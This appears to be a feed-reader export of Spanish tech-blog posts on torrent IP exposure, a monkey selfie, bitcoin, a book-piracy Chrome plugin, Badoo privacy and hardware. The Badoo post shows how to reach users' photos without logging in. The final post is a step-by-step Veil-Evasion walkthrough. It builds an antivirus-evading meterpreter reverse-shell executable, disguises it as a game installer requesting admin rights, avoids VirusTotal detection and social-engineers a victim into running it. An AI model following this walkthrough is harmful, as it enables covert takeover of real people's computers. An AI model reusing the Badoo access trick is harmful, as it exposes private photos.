Lo que hace el sitio es buscar información en la red DHT de BitTorrent. Sin embargo, lo que muchos no sabían es que, junto a la información que se guarda del propio torrent, también podemos encontrar las IP de los usuarios que están descargándolo. Sin duda, una acción que podría provocar problemas a más de uno, ya que se estaría publicando una información que permitiría a las autoridades encontrarles y denunciarles con facilidad.

Comprobar la situación es realmente sencillo. Sólo tenemos que entrar en el buscador, y darle a la descarga que queramos. En la propia ficha podremos encontrar una pestaña con el nombre de Peers la cual, si hacemos click sobre ella, nos mostrará la información que estamos buscando. Nosotros hemos hecho una prueba con el archivo The Expendables 3, y esto ha sido lo que hemos conseguido:

BTindex

También hay que destacar que, si buscamos una dirección IP, podremos comprobar cómo el sitio ha guardado toda la información que se tiene sobre ella:

BTindex

Está claro que BTindex está realizando una actividad que podría no gustar a muchos usuarios. Aunque la red DHT se puede desactivar en cualquier momento, no hay duda de que muchos internautas se verán expuestos. Y teniendo en cuenta que la información es guardada, no nos extrañaría que las empresas de la industria musical o cinematográfica se pusieran próximamente manos a la obra para identificar a quienes estén descargando contenidos con derechos de autor.

Vía | TorrentFreak
Más información | BTindex
En Genbeta | Bleep, analizamos la aplicación de chat seguro de BitTorrent

-
La noticia Con BTindex puedes saber las IPs de todos los que están descargando un determinado torrent fue publicada originalmente en Genbeta por Ildefonso Gómez.


08 Aug 12:02

Si un mono se hace un Selfie ¿quién es el propietario de la foto?

by Ildefonso Gómez
Miguelangelr

Pues ha salido guapo el jodío ;-)

Mono

La situación es curiosa, cuanto menos. Imagináos que os vais con vuestra cámara de fotos a una selva, con el fin de realizar un reportaje sobre la vida en la zona. Pero uno de los monos presentes la sujeta y se hace una foto a sí mismo. Un Selfie en toda regla. La imagen que ha quedado es realmente interesante. Pero lo que queremos saber en este caso no es la belleza del animal, sino a quién pertenece la propiedad del fichero.

Lo que hemos comentado en el párrafo de arriba es lo que le ha pasado a David Slater, quien ha visto cómo la fotografía ha sido subida a Wikimedia. Por supuesto, al ver lo que había sucedido, el ahora conocido fotógrafo se ha puesto en contacto con Wikimedia Commons con el objetivo de que retiren el archivo. No en vano, en un principio es de su autoría. Pero ¿qué pensaríais si el proyecto os dijera que no pueden quitarla porque el propietario de los derechos de autor es el propio animal?

Bueno, tenemos que aclarar que en realidad el mono no es el dueño de la foto. En realidad, nadie lo es. Básicamente, un animal no puede tener este derecho. Y el fotógrafo tampoco, porque él no la ha realizado. Ahí está la pregunta, ya que se encuentra en un pequeño limbo legal del que no se sabe cual será el resultado.

Tenéis que saber que Slater ya ha vendido el fichero a múltiples publicaciones que la han publicado en varios medios de comunicación, por lo que resulta curioso que los derechos de autor estén en esta situación. Seamos claros y repitamos lo que ya hemos dicho. Aunque el animal se haya hecho la foto a sí mismo, es imposible que tenga su propiedad. Y aunque el fotógrafo se haya gastado un montón de dinero en el viaje y el equipamiento (un total de 7.000 libras, según ha comentado), volvemos al mismo punto: legalmente, el archivo no es de nadie. Puede utilizarse libremente.

Parece que, por el momento, David Slater tendrá que seguir luchando contra Wikimedia si quiere intentar conseguir la propiedad de la foto. Resulta curioso que un Selfie de un mono esté dando tanto problemas. ¿Qué pensáis vosotros?

Vía | Gigaom | The Telegraph
Más información | Wikimedia
En Genbeta | Selfies, una aplicación centrada en compartir fotos de nosotros mismos

-
La noticia Si un mono se hace un Selfie ¿quién es el propietario de la foto? fue publicada originalmente en Genbeta por Ildefonso Gómez.


08 Aug 11:55

¿Y tú? ¿Te dedicas a dibujar cuando corres? Pues no eres el único :)

by Posted by pharizna
Miguelangelr

Je, je, je


Sin duda recordaréis las "curradas" revisiones que hacíamos en su tiempo comparando la precisión (que no error) de diferentes GPS siguiendo un mismo recorrido. Incluso hasta teníamos muy localizadas ciertas zonas de "sombra" en donde se podía ver claramente las mejoras de unos frente a otros ... pero de ahí a dibujar "figuritas" como le gusta a Claire Wyckoff hay mucho trecho.

A esta señorita, a la que se empieza a conocer como la runner artista le gusta correr de forma creativa, dejando huella y creando estilo. Y lo consigue gracias a la aplicación Nike+ de esas que registra todos los datos de tu carrera y los muestra en un mapa en tu smartphone.

La señorita Claire siente predilección por un tema muy concreto: el dibujo de penes. Algo que en sí mismo ya es un factor muy positivo, pero es que, además también tiene fuertes inclinaciones frikis y es capaz de dibujar un Space Invader perfecto, lo que la sitúa automáticamente en la categoría de personas dignas de nuestra más sincera admiración...
06 Aug 09:15

Éste plugin para Chrome muestra enlaces a torrents de los libros dentro de Amazon

by Ildefonso Gómez
Miguelangelr

La releche

Amazon

Amazon tiene actualmente una de las bases de datos de libros digitales más grandes del planeta. La tienda se ha estado expandiendo durante todos estos años con el fin de ofrecer a sus consumidores todos los títulos que pudiera. Los precios son bastante atrayentes, sobre todo si los comparamos con los que tienen las copias físicas. Pero ¿y si alguien pueda descargarlos, muy a pesar de Amazon, en pocos clicks, y sin tener que pagar?

Hay suficientes herramientas en Internet que nos permtirán descargar libros de forma gratuita, aunque estos tengan derechos de autor. No obstante, uno de los últimos plugins que se han anunciado para Google Chrome, el navegador de Google, es realmente sorprendente. Concretamente, LibGen realiza modificaciones en el aspecto de Amazon (cambios locales, claro) para que podamos descargar los libros que queramos sin tener que pagar.

Digámoslo de otra manera. Cuando tengáis instalada la extensión, sólo tendréis que visitar la librería de Amazon para que el plugin se encargue de colocar un enlace a una versión gratuita y completa del libro que estemos viendo. Por supuesto, la descarga no será instantánea, sino que en realidad tendremos que descargar un torrent, que será el que nos proporcionará el documento.

La verdad es que el funcionamiento de la extensión es realmente curioso, maxime cuando inserta una barra adicional en la parte superior en la que podremos encontrar la información básica de la descarga. Está claro que cada vez es más fácil encontrar este tipo de recursos.

LibGen es una extensión que ya se encuentra disponible en exclusiva para Google Chrome, aunque desconocemos si Amazon tiene previsto realizar algún tipo de acción al respecto. No en vano, pierden dinero cuando alguien decide descargar los ficheros sin pagar. Tampoco podemos olvidar que existen iniciativas muy parecidas, con funcionamientos similares (y en la misma tienda), por lo que podríamos decir que, en materia de descargas, hay herramientas para todo.

Vía | TorrentFreak
Más información | LibGen
En Genbeta | Así funcionan las recomendaciones de Amazon

-
La noticia Éste plugin para Chrome muestra enlaces a torrents de los libros dentro de Amazon fue publicada originalmente en Genbeta por Ildefonso Gómez.


06 Aug 09:14

Diez webs en las que ya puedes pagar con bitcoin

by Miguel López
Miguelangelr

Bitcoin toma fuerza

bitcoin

Hace ya más de un año, con el fenómeno del bitcoin en boca de todos, os mostramos una lista de doce sitios que ya aceptaban esta criptomoneda. Y ahora que ha pasado el tiempo, al contrario de lo que pensaban los más pesimistas, cada vez más portales cobran con bitcoins.

Así que vamos a actualizar la lista con diez portales más. Portales de una relevancia que yo jamás me habría imaginado hace un año que apoyarían este tipo de moneda anónima y descentralizada, pero que ahora ya no hace falta que lo imagine. El bitcoin sigue viéndose como algo raro entre la población general, pero poco a poco va cobrando relevancia en las empresas. Y es justo donde hay que tenerla. Veamos esa lista de compañías.

  • Square, la plataforma que quiere facilitar los pagos utilizando el móvil, comenzó a aceptar bitcoins en abril utilizando los servicios de conversión en Coinbase como puente. A través de un código QR que se genera en el móvil del usuario, los pagos se realizan de forma transparente sin que el vendedor se tenga que preocupar de criptomonedas y conversiones.
  • El portal de viajes Destinia también acepta bitcoins en su portal desde hace más de medio año. Su máximo responsable, Amuda Geli, nos confirmó cien reservas en una semana.
  • Newegg, una tienda de informática y componentes electrónicos, integra el bitcoin como otro método de pago al confirmar sus encargos. Es más: tienen un descuento si el pedido se pasa de los cien dólares para animar a los clientes a usar la criptomoneda.
  • El servicio de encargo de comida preparada Foodler es perfecto para el uso de bitcoins, ya que precisamente quiere agilizar el proceso de encargar comida cómodamente y desde el móvil. Lo único que hay que hacer es canjear bitcoins por saldo virtual de Foodler, que a su vez se puede gastar en comida preparada.
  • Las citas también beneficiarse de una moneda digital: el popular portal OkCupid acepta bitcoins para todos aquellos usuarios que quieran suscribirse al plan premium del servicio. Vamos, hasta hay una lista de solteros y solteras interesados en bitcoins por si quieres compartir experiencias vividas con esa moneda.
  • Overstock es un popular portal de muebles, accesorios y otros artículos que envía a varios países del mundo (incluida España). Patrick Byrne, el CEO de la compañía, incluso ha dado personalmente alguna charla respecto al bitcoin.
  • Expedia empezó a probar los cobros con bitcoin hace poco más de un mes, y muy recientemente han dicho que las reservas de viajes con esta moneda han superado todas las expectativas.
  • Este seguro que lo conocéis: La Wikipedia (y resto de la fundación Wikimedia) ha empezado a aceptar donaciones con bitcoins. Un buen gesto teniendo en cuenta que precisamente subsiste a base del dinero que aportan todos los usuarios desinteresadamente.
  • Dell, otro fabricante de ordenadores, "da la bienvenida" al bitcoin integrándose con los monederos de Coinbase directamente en la tienda online.
  • Por último, si lo que quieres no son portales que acepten bitcoins sino ser tu el que los acepte desde tu web, el servicio de contabilidad Intuit está preparado para aceptar la moneda en las transacciones que tu web o empresa pueda hacer.

Imagen | Jason Benjamin
En Genbeta | Vía libre al uso de Bitcoin y otras monedas virtuales en California

-
La noticia Diez webs en las que ya puedes pagar con bitcoin fue publicada originalmente en Genbeta por Miguel López.


05 Aug 19:47

¿Qué relación existe entre Nessie y el hackeo de los NAS de Synology?

by Posted by pharizna
Miguelangelr

Hijos de puta!!! que yo me quería comprar una.

La "democratización" de la tecnología también ha revolucionado las noticias veraniegas y si antes de la existencia de Internet los periódicos tenían que rellenar sus páginas con apariciones del famoso Nessie ( monstruo del Lago Ness) ahora nos toca asustar con la posibilidad que se abre para hackear los vuelos comerciales "gracias" al recientemente aprobado uso de WiFi en su interior.

En teoría, un hacker podría utilizar la señal Wi-Fi o en vuelo del sistema de entretenimiento a bordo de un avión para introducirse en sus equipos y alterar o modificar las comunicaciones por satélite, lo que a su vez podría interferir con los sistemas de navegación y de seguridad de la aeronave. No obstante el español que ha descubierto estos fallos reconoció que sus hacks sólo se han probado en entornos controlados, como el laboratorio de IOActive en Madrid, y que podría ser difícil de reproducir en el mundo real.

Ya que estamos "asustando" con el tema de los hackers... pero a nivel más terrenal / particular estos últimos días se está hablando mucho de SynoLocker ... un malware que infecta tus NAS de Synology encriptando su contenido y pidiéndote dinero para poder recuperar su contenido...
05 Aug 08:28

Badoo publica sus adictos al Sexo: En Badoo, todas tus fotos, tu información personal y tus aficiones son públicas

by noreply@blogger.com (Maligno)
Miguelangelr

Un poco de hacking con Google ;-)

Podría pensarse, después de leer y probar lo que se publicó en el artículo Badoo, un aspirante a bombero y algo de Ingeniería Social: No te fíes nada de esa chica que te entra por WhatsApp, que únicamente se puede acceder “a tamaño completo” a la primera imagen del perfil indexado en los buscadores o que hiciera falta un poco de conocimiento sobre técnicas de dorking para tener éxito en la búsqueda de fotografías de usuarios y conversaciones íntimas de estos. E incluso que no fuera posible obtener la información de los perfiles de usuario de los miembros de Badoo.

El presente artículo quiere poner de manifiesto que no hace falta un conocimiento avanzado sobre el uso de los principales buscadores de Internet para obtener perfiles de usuarios de la red social Badoo, y que se puede tener acceso a todas las imágenes que éstos hayan dejado en la red social, así como a la información de sus perfiles privados.

Cómo buscar a un usuario de la red social Badoo sin tener conocimientos acerca de Hacking con Buscadores. Como se muestra en la siguiente imagen, sólo con poner el nombre de la red social y un nombre de una persona, los buscadores nos devolverán resultados sobre todas las coincidencias que tengan indexadas:

Figura 1: Perfiles de "Trini" de España en Badoo indexados en Google

Figura 2: Perfiles de Trini de España en Badoo indexados por Bing

Si por ejemplo consultados cualquiera de los resultados devuelto por Google, el resultado del perfil que se obtiene, que se recuerda que es totalmente público y está abierto a todos en Internet, es el que se ve en la siguiente imagen:

Figura 3: Un perfil de la red social Badoo publicado en Internet

Hemos tapado las caras, pero tanto la foto de la menor como las del perfil han sido subidas voluntariamente y publicadas en Internet para todo el mundo. Si ahora quisiéramos obtener todas las imágenes a tamaño real - observamos que este usuario tiene 4 -, el resultado de Badoo es el mostrado en la siguiente imagen:

Figura 4: Si quieres ver las fotos Badoo te pide registrarte

La propia red social Badoo nos envía a la primera página para que, en caso de tener interés por ver más imágenes de esa persona, nos demos de alta en la red social. Sin embargo, veremos en el siguiente apartado cómo NO es necesario estar dado de alta para poder obtener todas sus imágenes de Badoo.

Para obtener todas las imágenes personales de un usuario de esta red social solo hay que pedir la URL /photos/ del perfil, para que nos lleve sin redirección alguna a la ficha de las fotografías del perfil. Una vez allí, en cada foto usar la opción de abrir en una nueva pestaña y listo. La foto aparece completa, además de todos los comentarios públicos.

Figura 5: Con pedir la URL /photos/ te da acceso a todas las fotos a tamaño real

Si ahora pulsamos sobre el botón Perfil y consultamos el perfil de este usuario, Badoo volverá a redirigirnos a la pantalla de login. Veremos cómo obtener la información de los perfiles del usuario.

Pero... todo está indexado y cacheado en Google, así que es suficiente con hacer una búsqueda como la primera para localizar los perfiles, pero añadir algún termino que esté en el perfil, como por ejemplo, "Relación de Pareja". Como se puede ver hay una barbaridad de ellos indexados en caché, y se podrán ver todos ellos.

Figura 6: Lista de perfiles indexados y cacheados en Google

Incluso, se puede buscar información de perfiles, de forma pública, sin registrarse, de manera anónima y desde Internet, con términos como "Adicta al Sexo".

Figura 7: Perfiles con el comentario de "Adicta al sexo" en su perfil cacheado en Google

Este artículo no es más que otro grito a Internet para ver si conseguimos concienciarnos todos de que debemos tener cuidado con a quién le damos nuestros datos, y lo que es peor, que dejemos de ser utilizados como mercancía por sitios como estos. No hay que olvidar que Badoo se lava las manos y responsabiliza a los usuarios de todo lo que publican.

Autores: Amador Aparicio y Chema Alonso
Twitter: @amadapa y @chemaalonso
04 Aug 16:43

Ya está a la venta el nuevo pcDuino8 ... con un microprocesador de 8 cores!

by Posted by pharizna
Miguelangelr

Mira que al final me pico con el tema....


El pasado mes de abril tuvimos el gusto de revisar el pcDuino v3 y la verdad es que nos gustó... y mucho. Aparte de poder utilizar los "shields" de Arduino dispone de toda la potencia y más de la RPi... aunque falla en el tema multimedia ya que no reproduce correctamente los vídeos de alto "bitrate" :(.

Por eso el nuevo pcDuino 8 con un procesador Allwinner A80 de 8 cores y la posibilidad de reproducir vídeos en resolución 4K convierten a la nueva placa en un objeto de deseo... que intentaremos revisar aquí lo antes posible.

Como en casos anteriores el nuevo pcDuino incluye una versión de Scratch que permite el acceso al hardware de Arduino pudiendo funcionar la placa en Android 4.4 y próximamente en Ubuntu ... aunque no se descarta la posibilidad de que también en un futuro pueda funcionar con Chrome OS...
03 Aug 12:21

Bypass de Antivirus con Veil Evasion

by Colaborador
Miguelangelr

Una de maldades, je, je, je

Buen dia comunidad, un gusto compartir con ustedes este post en el que les hablaré de Veil-evasion,s un framework creado por Christopher Truncer para generar ejecutables que no sean detectados por los antivirus comunes, técnica normalmente conocida como bypass de antivirus, evadir antivirus o simplemente volver in-detectable un ejecutable.
A continuación veremos como paso a paso, utilizando este framework generamos un ejecutable que nuestro antivirus analizara y no lo tomara como una amenaza.

Lo primero que debemos hacer es abrir una terminal en nuestro kali.

Bypass Antivirus016 Bypass de Antivirus con Veil Evasion

Con el comando apt-get update lo que en realidad vamos ha hacer es actualizar los repositorios, ver si hay algo nuevo, es decir actualizar la lista de todos los paquetes, con la dirección de dónde obtenerlos para que a la hora de hacer la búsqueda y su posterior descarga, sea más rápida.

Bypass Antivirus019 Bypass de Antivirus con Veil Evasion

Luego apt-get upgrade,que lo que hace es una actualización de nuestro sistema con todas las posibles actualizaciones que pudiera haber, es decir no sólo actualiza nuestro sistema operativo sino que también las aplicaciones que están contenidas en los repositorios. Este paso puede ser algo demorado dependiendo de la cantidad de aplicaciones.

Bypass Antivirus020 Bypass de Antivirus con Veil Evasion

Después de haber actualizado nuestro kali, continuamos con la instalación de nuestro framework Veil usando el comando apt-get install veil. Este paso también tarda un poco ya que se realiza una descarga de 195 Mb.

Bypass Antivirus021 Bypass de Antivirus con Veil Evasion

Después de instalar Veil, naveguamos hasta el directorio de instalación con el comando cd /usr/share/veil-evasion/setup/ estando dentro del directorio con el comando ls listamos los ficheros dentro de la ruta, podremos visualizar un script con el nombre setup.sh y lo ejecutamos el comando ./setup.sh

Bypass Antivirus022 Bypass de Antivirus con Veil Evasion

El script se ejecutara

Bypass Antivirus023 Bypass de Antivirus con Veil Evasion

Nos pide que hagamos unas instalaciones de Phyton damos clic en Next >.

Bypass Antivirus024 Bypass de Antivirus con Veil Evasion

Damos clic en Next >.

Bypass Antivirus025 Bypass de Antivirus con Veil Evasion

Remplazamos los archivos existentes dando clic en Yes.

Bypass Antivirus002 Bypass de Antivirus con Veil Evasion

Damos clic en Next >.

Bypass Antivirus026 Bypass de Antivirus con Veil Evasion

Damos clic en Finish.

Bypass Antivirus045 Bypass de Antivirus con Veil Evasion

Damos clic en Siguiente >.

Bypass Antivirus049 Bypass de Antivirus con Veil Evasion

Damos clic en Siguiente >.

Bypass Antivirus048 Bypass de Antivirus con Veil Evasion

Damos clic en Terminar.

Bypass Antivirus047 Bypass de Antivirus con Veil Evasion

Damos clic en Siguiente >.

Bypass Antivirus046 Bypass de Antivirus con Veil Evasion

Damos clic en Siguiente >.

Bypass Antivirus048 Bypass de Antivirus con Veil Evasion

Damos clic en Siguiente >.

Bypass Antivirus043 Bypass de Antivirus con Veil Evasion

Damos clic en Terminar.

Bypass Antivirus050 Bypass de Antivirus con Veil Evasion

Finalmente tenemos el framework de Veil instalado y configurado en nuestro kali con el comando clear limpiamos nuestra consola.

Bypass Antivirus017 Bypass de Antivirus con Veil Evasion

Nos devolvemos al directorio root con el comando cd /root y abrimos Veil con el comando veil-evasion

Bypass Antivirus003 Bypass de Antivirus con Veil Evasion

Esta abierto nuestro Veil con diferentes opciones

Bypass Antivirus027 Bypass de Antivirus con Veil Evasion

Con el comando list nos muestra los payloads que podemos usar

Bypass Antivirus028 Bypass de Antivirus con Veil Evasion

En la versión 2.4.3 que he instalado me aparecen un total de 24 payloads.

Bypass Antivirus051 Bypass de Antivirus con Veil Evasion

Ingresamos el número del payload a utilizar en este caso usare el número:

18) python/metertpreter/rev_tcp

Bypass Antivirus037 Bypass de Antivirus con Veil Evasion

En otra terminal con el comando ifconfig averiguamos la ip de nuestro kali para que la víctima se conecte hacia nosotros con el archivo.exe que crearemos con Veil.

Bypass Antivirus029 Bypass de Antivirus con Veil Evasion

Con el comando set LHOST 10.0.1.31 (la ip de nuestro kali o localhost) agregamos un parámetro que es obligatorio para poder crear nuestro archivo.exe

Bypass Antivirus037 Bypass de Antivirus con Veil Evasion

Con el comando generate crearemos el archivo.exe

Bypass Antivirus038 Bypass de Antivirus con Veil Evasion

Ingresa el nombre del archivo en mi caso le pondré “archivo”

Bypass Antivirus004 Bypass de Antivirus con Veil Evasion

Ingresamos el número del tipo de .exe en mi caso pondré el

1)    Pyinstaller (default)

Bypass Antivirus014 Bypass de Antivirus con Veil Evasion

Se ha creado nuestro archivo.exe y nos muestra todos los parámetros que le hemos pasado además la ruta donde se ha creado /root/veil-output/compiled/archivo.exe

Bypass Antivirus015 Bypass de Antivirus con Veil Evasion

Presionamos CTRL+C para salir de Veil y ponemos la ruta donde se encuentra nuestro archivo con el comando cd /root/veil-output/compiled/ para revisar que si se haya creado exitosamente ingresamos el comando ls para listar los archivos de esta carpeta, como podemos ver se creó satisfactoriamente

Bypass Antivirus005 Bypass de Antivirus con Veil Evasion

Daremos un toque más personalizado a nuestro archivo.exe poniéndole otro nombre y un icono más llamativo, para hacer esto llevamos nuestro archivo a un entorno Windows, usaremos winrar y un icono para pulir nuestro archivo.exe

Bypass Antivirus006 Bypass de Antivirus con Veil Evasion

Señalamos los dos archivos damos contra clic y seleccionamos Añadir al archivo

Bypass Antivirus033 Bypass de Antivirus con Veil Evasion

Le damos un nombre llamativo a nuestro archivo en mi caso es el nombre de un instalador para un juego de Xbox 360 “Install Gears Online.exe” y damos clic la opción crear archivo autoextraíble luego continuamos a la pestaña Avanzado

Bypass Antivirus039 Bypass de Antivirus con Veil Evasion

Damos clic en Autoextraíble… en algunas visiones de winrar dice FX

Bypass Antivirus040 Bypass de Antivirus con Veil Evasion

Damos la ruta de extracción de nuestros archivos y damos clic en Instalación

Bypass Antivirus007 Bypass de Antivirus con Veil Evasion

Ponemos el nombre de nuestro archivo.exe con extensión, damos clic en Modos

Bypass Antivirus008 Bypass de Antivirus con Veil Evasion

Damos clic en Ocultar todo y luego en Avanzado

Bypass Antivirus009 Bypass de Antivirus con Veil Evasion

Damos clic en Solicitar acceso como Administrador y luego damos clic en Actualizar

Bypass Antivirus010 Bypass de Antivirus con Veil Evasion

Damos clic en Omitir ficheros Existentes y luego en Texto e icono

Bypass Antivirus011 Bypass de Antivirus con Veil Evasion

Examinamos la ruta del icono llamativo
Bypass Antivirus001 Bypass de Antivirus con Veil Evasion y damos clic en Aceptar

Bypass Antivirus012 Bypass de Antivirus con Veil Evasion

Clic en Aceptar
Bypass Antivirus041 Bypass de Antivirus con Veil Evasion

Ya tenemos nuestro archivo.exe con un nuevo icono y un nuevo nombre

Bypass Antivirus034 Bypass de Antivirus con Veil Evasion

La prueba de fuego escanearlo con un antivirus y recién actualizado

Bypass Antivirus035 Bypass de Antivirus con Veil Evasion

Ha pasado la prueba el EsetNod32 actualizado, no detecto amenazas en nuestro archivo

Bypass Antivirus036 Bypass de Antivirus con Veil Evasion

Les recomiendo no subir este tipo de archivos para probarlos en páginas como VIRUS TOTAL ya que estas se encargan de enviar estos datos para que sean examinados y reportar a las casa software de antivirus y podríamos perder la funcionalidad del framework.

Bypass Antivirus018 Bypass de Antivirus con Veil Evasion

Con un poco de ingeniería social hacemos llegar este archivo a nuestra víctima ya sea por correo un amigo muy cercano o de la manera que se les pueda ocurrir, el éxito depende un poco, de cuanto sepamos de esta persona ya que si es alguien que no le gusten los videojuegos como lo es en mi caso dudo mucho que lo abra. Es decir una imagen y nombre acorde a los gustos de nuestra víctima. Volviendo a nuestro kali abrimos Metasploit-framework con el comando msfconsole esto tarda un poco

Bypass Antivirus030 Bypass de Antivirus con Veil Evasion

Utilizamos el comando use exploit/multi/handler y tomamos los parametros del localhost, del localport y el payload que utilizaremos. Damos el comando exploit para que corra el exploit

Bypass Antivirus031 Bypass de Antivirus con Veil Evasion

Asumiendo que la víctima abre el “instalador del juego” miramos en nuestro kali que esta sucediendo

Bypass Antivirus013 Bypass de Antivirus con Veil Evasion

A nuestra victima si le gustan los videojuegos GAME OVER

Bypass Antivirus032 Bypass de Antivirus con Veil Evasion

 

Para más información visita la pagina oficial del framework:
https://www.veil-framework.com/

Y sus excelentes guías y vídeos:
https://www.veil-framework.com/guidesvideos/

 Articulo escrito por Edgar Parra para La Comunidad DragonJAR